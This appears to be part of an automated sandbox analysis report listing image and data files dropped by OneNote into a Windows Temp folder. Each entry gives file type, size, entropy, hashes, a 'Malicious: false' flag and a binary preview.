SHA1:	E272821BF80B51C7B796AFFB959ABF75449EE5D3
SHA-256:	27B62B288E70710DC04D9CC58EB407E0D874EF14282571600FA9E6AFA4CFE56C
SHA-512:	6F54F30BE9FE773F6EB01D6C86C3B02DF08EA7BAC781B8AF4D9976B78BB30E65DF06544ADC71146A8E34628D3FB0BE664D2D36E5FF457E6FF7623CF6DDADF05D
Malicious:	false
Preview:	./.C..vL....W"v_ve.....I...6.N.................?.....I...............................................................................................................h............................................}.+..PH.K...............g...<"H.~.Z...,............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{BFB75A52-A988-4BA5-9145-4E46DC25B8FE}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:15:20], progressive, precision 8, 604x784, components 3
Category:	dropped
Size (bytes):	140755
Entropy (8bit):	7.9013245181576695
Encrypted:	false
SSDEEP:	3072:i/aDiblRsFcOco8dofE5Zx1+NQI8Wh9aiOe5NTO:mnbM+TxaAi98W3aiOwTO
MD5:	CC087700C07D674D69AFDFDA0FA9825C
SHA1:	F11113DF69DACDB255C6CBCFB29C1D1CCE40B346
SHA-256:	A7FA7F092EFF43030A56342C39A765F8D5CC48C7DB815DDFC8C1E5EC40117FAE
SHA-512:	843202D975EFA91E73287052A893584B6E5AE601F91612B56539AA2F73D1AD3F997FCAD1E711E0F483A2E91D46D9643D0B026B43F4E94116A5D2FB6551536034
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:15:20.............................\.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................{.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.......J...\O.,......../$..........OE.m.o......T....Z..l.g.-....m.?...Y....3......"....].j.X.k.S.k.....4..R....{....?F.

C:\Users\user\AppData\Local\Temp\{C1C22178-D10F-468F-AD75-5363287D6B7D}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	7.252780160030615
Encrypted:	false
SSDEEP:	48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
MD5:	F6C596F505504044DF1E36BA5DA3F09B
SHA1:	BCF17EC408899B822492B47E307DE638CC792447
SHA-256:	EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
SHA-512:	E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
Malicious:	false
Preview:	.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....

C:\Users\user\AppData\Local\Temp\{C265361C-7CFC-477A-92BD-FE5B21DA13D3}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Temp\{C4DA6D4A-B2E8-46EE-83B4-751399F7D399}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4744
Entropy (8bit):	0.6475139816902042
Encrypted:	false
SSDEEP:	6:RaCQbYyfB3h1RRXUnf1qyoFFBl/FKBPQskEqPQJRujlw//0lweI/YfqPQ7Rujd:RadYyf9/Uf1iFFBt4DkEeVWf/eeN
MD5:	983629075BE5F47D1B8B5F790437671B
SHA1:	9E91D7C74D0C8179C1508D1492E6C2817B841115
SHA-256:	4BFF4C7496D6B0B8D7E0F405093377269E5094E6F028902B3470917A74EE2489
SHA-512:	5318D95D9D7ED5B8C8DBC24BCE02EA873A1F7C783AD4C683A84BC64309C482E824A6E6EF5A973574CEB6AB6566B4AD9AE8A6298ECA029F59FC16C7A6E8D2EAB3
Malicious:	false
Preview:	./.C..vL....W"v_.._.Qg.B...5J.y.................?.....I...............................................................................................................h...........................................A....@.+.@^.%0........0.....C....................................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{C6ED19D4-DB09-42D3-B044-4C176B28C1D6}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Temp\{C888406B-E53E-49D1-B635-6ACC5754D5B5}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Temp\{CEC72066-FE14-4BC5-9D0D-E30DABE7CCEE}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	136726
Entropy (8bit):	7.973487854173386
Encrypted:	false
SSDEEP:	3072:SIXmy5Tl704vW2ZKkvV8UU0ZWUF0BJwySIdgz816YzDc1+opecYPn:Sny5Tl704fZFV8UU6LGXwyS4xohpQPn
MD5:	4A2472AC2A9434E35701362D1C56EDDF
SHA1:	16FA2EA2D2808D75445896E03B67A93000EEDDD8
SHA-256:	505F731CB7707EFAB2EB06685B392DC7E59265A40B55AAE43E5DC15C0A86CBA4
SHA-512:	5E28D8FB2AC62ED270968072A30013334461F7CAE96058AF9EAA6E10912989DC47112D2133892BF61F7A516B77C6FF71BA2A000B750A9F95C787E538B09595C2
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..AQaq".....2B....R#..b3...r...C$...X.....Sc...9.%'.(Hs4Dgw..T..5GW.x.)......................!.1..AQa"2.q.......B..#c........b6.Rr.3s$.&..S...C4.%5............?.........(......(......(......(......(......(......(......(.G/.GE&...)..P.x..B.({i2Y;.z?G...Yfc.)H..^....#.....}3..Sc^.H..+...M.a.P.....GS.....H_.3..<....1f........1.<.\..nn-..s.s.\9Y....=.......S.0.......N..cA..Io..r.3..........ay.....K.....,.;9..Q......xO.Fa.2..>........{4k.....\|....?U....3.8..._/3....#.. t.y......yY.......e.<........#.....B.....Z.%.Y..S.ye.W4...l.......X...%.@y}>....l.yi..D..W......L..._D.Q....)...E....n.%...*..K.4#.8`..I....h..h.o..I......-...hB...3..u.(5..........n...,.@....a.t.9.....@.s.>.&...@

C:\Users\user\AppData\Local\Temp\{CF64C056-B428-4A6C-9E03-F7355C5C1A6E}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Temp\{CF9FB3D3-D732-4D4B-BF43-E1CE3B921B4F}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	34299
Entropy (8bit):	7.247541176493898
Encrypted:	false
SSDEEP:	768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
MD5:	E9C52A7381075E4EBC59296F96C79399
SHA1:	BE295AD24D46E2420D7163642B658BF3234A27EA
SHA-256:	D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
SHA-512:	95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q\|..'.;\..6..v......e...../.k..\|.8..i..\|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.\|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L\|.'5...

C:\Users\user\AppData\Local\Temp\{D01D9708-5C50-4129-A9A9-75CA9E1303ED}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Temp\{D17C8CEF-30F3-4398-A0F9-52071B6509C0}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 500, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2033
Entropy (8bit):	6.8741208714657
Encrypted:	false
SSDEEP:	48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
MD5:	CA7D2BECCBC3741D73453DCF21D846E0
SHA1:	E34B7788498E33FFF0CFB00125E6BA9E090F6CED
SHA-256:	E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
SHA-512:	7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
Malicious:	false
Preview:	.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z

C:\Users\user\AppData\Local\Temp\{D1AF5263-2413-43E3-A97C-77118784F8D0}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Temp\{D2178244-2503-4BF3-BAA6-09369A9C9FF4}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Temp\{D5373C65-FEF7-49F3-A610-ABCC64C5FEAC}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Temp\{D62A929F-A51B-41E4-9EA0-5ADDC8DDA93D}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	4410
Entropy (8bit):	7.857636973514526
Encrypted:	false
SSDEEP:	96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
MD5:	2494381A1ACDC83843B912CFCDE5643B
SHA1:	98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
SHA-256:	5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
SHA-512:	0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
Malicious:	false
Preview:	.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}\|..{'.U..~......}....s.............,CVu.x.:C..5...;.

C:\Users\user\AppData\Local\Temp\{D788972F-D017-4825-AC07-009CB077DB2C}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	179460
Entropy (8bit):	7.979020171518325
Encrypted:	false
SSDEEP:	3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
MD5:	4E131DBFEC5C2462273CA7B35675B9D9
SHA1:	CA037F444D819A118AC37D7AA3782B9BF94C1616
SHA-256:	2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
SHA-512:	C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k............#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik\|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,x.

C:\Users\user\AppData\Local\Temp\{D8260743-371B-4B83-A123-F760EB8232BB}

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:06:24], progressive, precision 8, 38x792, components 3
Category:	dropped
Size (bytes):	22203
Entropy (8bit):	6.977175130747846
Encrypted:	false
SSDEEP:	192:5q3R1VBvq3R1Flrk6Q0QPJJrR39joOVMJ25d1NkMhIwobbtAAAqYnLJZMJYZ2AC:xw6Q0WJR3FoOVMJIIlAAAqYnMJdD
